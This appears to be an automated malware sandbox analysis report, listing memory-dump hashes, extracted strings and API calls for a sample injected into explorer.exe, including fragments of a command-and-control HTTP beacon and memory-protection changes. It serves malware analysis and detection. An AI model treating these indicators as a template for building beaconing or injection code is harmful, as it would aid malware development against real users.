• Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
• Instruction ID: e081e51034472a101d203b2e356300cbfc50c2ee2fb834f54ab95a85f3a507bf
• Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
• Instruction Fuzzy Hash: F7E0EC769506889FDB22DF9DCA40F5ABBB9BB85B00F190454B508AB660D724EA00CB40

Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
• Instruction ID: 3386a49e00997b23e0621080affdb9adb4d2f2a07855342cf81e0e0873bd2d0b
• Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
• Instruction Fuzzy Hash: 8ED05232214610ABC732AA1CBC00BC332E8BB88B21F020859B008C7061C364EC818680

Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
• Instruction ID: 2ca0d63dbe3d36c3fd86bcebddd2d267616f9f2e475fd0bd7af0e681b52bb635
• Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
• Instruction Fuzzy Hash: 01D0123320607197DB396659B914F67B919EF81AA4F1A046D7A0ED3A04D5148C42D6E1

Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction ID: e005f4643d18f7c4ed2df1c4d88f34534ba3639b327d955eb0b90051700046fe
• Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction Fuzzy Hash: 8BD0C936312D80DFD61BCB0CC894B0933A8BB44B40F810490F801CB722D22CDA80CA00

Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction ID: f2dc665b98b5943aad14c1b6cfddf004f5ffcb97a6ee206437cd2d5447eed7b4
• Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction Fuzzy Hash: A4D0123610024CEFCB06DF44C850D5A7B2AFFD8710F108019FD19076108A31ED62DA50

Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
• Instruction ID: 0f2bc7c9b5034089eb495de0c87cf9971d74d030438bc7fcdb3637a2c640cb29
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63C08C711412C06AEB2B5B08D928B283A58BB09B05F84019CEF009D5A2C76EDB418208
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6e74fd2578fbaa74b95bcf739f12f072bab6d6e76621abc9138347116e9c5158
                                                                                                                                                                                                        • Instruction ID: e1e892f2598e9b26e638b3cf97af5a6ad79631dddaf664f50827cebed775bc20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e74fd2578fbaa74b95bcf739f12f072bab6d6e76621abc9138347116e9c5158
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99900231605400229680715959845464005E7E1302B51C416E5418554CCA248A5A6361
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a18b924469fe57e4609be96bb9e7b59887a5a58cf667232bbcd198f66481a648
                                                                                                                                                                                                        • Instruction ID: 938aa4beddf1ffd025daf6b39b7d0a524049fe62b3f2f0f876758f8e4f0c328a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a18b924469fe57e4609be96bb9e7b59887a5a58cf667232bbcd198f66481a648
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25900261601100524680715959044066005E7E2302391C51AA5548560CC6288959A269
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 46039e0162f84c4740b6e32db67d873c11688a8014800351160ce8da7b5ec000
                                                                                                                                                                                                        • Instruction ID: bc2debc4a11ae5ca1fbdc64f8ee6db895ea418515335daa2104a681098e1bd4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46039e0162f84c4740b6e32db67d873c11688a8014800351160ce8da7b5ec000
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E490023160510412D640615956147061005D7D1302F61C816A5418568DC7A58A5575A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0f59faaec4c7ee826ca3b3e70b6baac1bc8888f419a338ec0441bd5d4f8b2cc0
                                                                                                                                                                                                        • Instruction ID: dbba4578d05369238e00d46df09c5ca3de61cd4bfeca3273594e86be7d01b0e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f59faaec4c7ee826ca3b3e70b6baac1bc8888f419a338ec0441bd5d4f8b2cc0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E9002A1201140A24A40A2599504B0A4505D7E1302B51C41BE6048560CC5358955A135
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e430993d2810d10b2be03c36758cac8941e32d8bc9b382ceee32c1041e36e70e
                                                                                                                                                                                                        • Instruction ID: 3830064f8405253bd806288d93adcd9b2dfb5d429781a44fe75122e8405bd31d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e430993d2810d10b2be03c36758cac8941e32d8bc9b382ceee32c1041e36e70e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E90022124505112D690715D55046164005F7E1302F51C426A5808594DC56589597221
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 36b6e8c3d753de2895f934754b346876886d30dca7d80448cb63ac434638517b
                                                                                                                                                                                                        • Instruction ID: 40aa3ad4ed25438636c295fabffa1fe7513caed52f65def742f9e473b30cbc20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36b6e8c3d753de2895f934754b346876886d30dca7d80448cb63ac434638517b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C90023120100852D64061595504B460005D7E1302F51C41BA5118654DC625C9557521
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1d17ebd64fd3e935e2ffb763dc48d48113ae95d5847b8b67343cd7ba9503922c
                                                                                                                                                                                                        • Instruction ID: bbfc38d679a3e2c5f0d24ebb4e33be7b13728086a5f78efd248d16cfa1e616f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d17ebd64fd3e935e2ffb763dc48d48113ae95d5847b8b67343cd7ba9503922c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D90022160500412D680715965187060015D7D1302F51D416A5018554DC6698B5976A1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f0e4e44953e8f2cefa345f0c061d03fc9715101ad9e3d1a5d24025b410033d87
                                                                                                                                                                                                        • Instruction ID: 9e5e0cda52d5650d057042cc4bfcb4e96472ba157df36af8e16a50be52cb9e74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0e4e44953e8f2cefa345f0c061d03fc9715101ad9e3d1a5d24025b410033d87
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5990023120504852D68071595504A460015D7D1306F51C416A5058694DD6358E59B661
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 788e54b9b783169ce066f429ce2732666a5a37ea2ce9d26ad5a5dc544bfd45d8
                                                                                                                                                                                                        • Instruction ID: 955c2be55ae8217e99e24fc291ee606584f0bc6858a34db471454f2d06a624f7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 788e54b9b783169ce066f429ce2732666a5a37ea2ce9d26ad5a5dc544bfd45d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B90023120140412D640615959087470005D7D1303F51C416AA158555EC675C9957531
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9280e2ab69d1565cef4561d45c723b1ce68523c2d5a52f850c43ab5425cc2e8b
                                                                                                                                                                                                        • Instruction ID: d455c2ccd02ddf6359525035814ad6cf49eaf8f75d2c7767953af072301d90fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9280e2ab69d1565cef4561d45c723b1ce68523c2d5a52f850c43ab5425cc2e8b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D90026120140413D680655959046070005D7D1303F51C416A7058555ECA398D557135
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction ID: a1bda6c2be24db6ec76ccdf2ddc1456221a733a323f02cd3ecc2110f76c3132c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874592
                                                                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874460
                                                                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01874507
                                                                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874530
                                                                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0187454D
                                                                                                                                                                                                        • Execute=1, xrefs: 0187451E
                                                                                                                                                                                                        • ExecuteOptions, xrefs: 018744AB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                                                                                        • Opcode ID: 1853153b1cdf170639db0d001ee66f3f7f1707e91f176471a449392adb681495
                                                                                                                                                                                                        • Instruction ID: dd54aea136b9da77d1c5f353ebd65c18a5b69f427175e0c8d265bf1ba87e642a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1853153b1cdf170639db0d001ee66f3f7f1707e91f176471a449392adb681495
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 125129B1A0021E6AEF15AB98DC95FA977A8AF58304F1804ADE605E71C1EB70DB41CF91
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $$@
                                                                                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                                                                                        • Opcode ID: e29dcecb95368341a4e315b2e167959bb246a6c19465597467a8aa725a60749b
                                                                                                                                                                                                        • Instruction ID: e3669067adbb1fb3a5897b0ead1147e61bc4b9ff8802a1bff2595f3d7529768a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e29dcecb95368341a4e315b2e167959bb246a6c19465597467a8aa725a60749b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8811C71D002699BDB36CB58CC45BEEB6B8AB08714F0041EAEA09F7291E7705F858F61

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.5%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:11.4%
                                                                                                                                                                                                        Total number of Nodes:79
                                                                                                                                                                                                        Total number of Limit Nodes:9

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                                        • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                        • API String ID: 1564272048-1117930895
                                                                                                                                                                                                        • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                        • Instruction ID: 29ddad213ecb6f3c517077fa864f551dcec769737ee2134a04db7cda2fd40dfa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86527E34628B488BC719EF68C4947EAB7E5FB54300F54466EC4AFC7186EE30B54ACB81

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID: `
                                                                                                                                                                                                        • API String ID: 823142352-2679148245
                                                                                                                                                                                                        • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                        • Instruction ID: 65057cfb723636d168dc97fa414352e9752544d51029639450fc70571e151a3d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53223AB0A18B099FCB59DF28C4957AAF7E6FB98301F44422EE45ED3690DB30E451CB85

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 443 13972e12-13972e6e call 13971942 NtProtectVirtualMemory 446 13972e70-13972e7c 443->446 447 13972e7d-13972e8f 443->447
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 13972E67
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                                        • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                        • Instruction ID: b72e4a88ce811c8da94be94b74a730746f429590658197cb15a79cca51ff0015
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301B134628B884F8788EF6CE48412AB7E4FBCD314F000B3EE99AC3250EB70C5414B42

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 448 13972e0a-13972e38 449 13972e45-13972e6e NtProtectVirtualMemory 448->449 450 13972e40 call 13971942 448->450 451 13972e70-13972e7c 449->451 452 13972e7d-13972e8f 449->452 450->449
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 13972E67
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                                        • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                        • Instruction ID: 07ba1ee58d154e07c64ecb4497760fd31c104014912f59938f3da317e864f50c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901A234628B884B8748EB2C94452A6B3E5FBCE314F000B7EE9DAC3240DB21D5024B82

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 1396C9A0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction ID: 3f758d35019bc0bf43445f28661e1adf3b1903a85c77f7a964a470a5565b0f54
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F531D171614B4C8BCB05EFA8C8857EEBBE5FB58204F40022ED44ED7240DE749645CB89

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 1396C9A0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction ID: 14173c4929a7bd1b6e1cfc49e55bbd040f20994efe6b03919982acafd861f3f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721C171A10B4C8BCB05EFA8C8857EEBBA5FF58244F40422EE45AD7280DE7496058B89

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                                        • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                        • Instruction ID: 1bcd038bdbfd1bf95698267686e244200782a5e1bb0dfa6a9f8d70017c448feb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 354149B4918A0C8FDB84EFA8C8D9BAD7BE4FB58300F44417EC84ADB255DE349945CB85

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                                        • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                        • Instruction ID: b8f20fae538504ac04e1cf3fb4fb00872b291fad7db502fa4b76420d2d307933
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B4138B4918A0C8FDB84EFA8C4D9BAD77E1FB68300F44417EC84ADB255DE349945CB85

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
